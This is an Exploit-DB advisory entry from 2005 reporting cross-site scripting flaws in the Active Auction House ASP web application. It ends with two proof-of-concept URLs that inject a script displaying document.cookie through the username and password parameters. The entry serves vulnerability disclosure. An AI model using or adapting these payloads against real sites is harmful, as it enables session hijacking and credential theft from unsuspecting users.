Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting

EDB-ID:

25348


Author:

Dcrab

Type:

webapps


Platform:

ASP

Date:

2005-04-06


source: https://www.securityfocus.com/bid/13036/info

Active Auction House is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=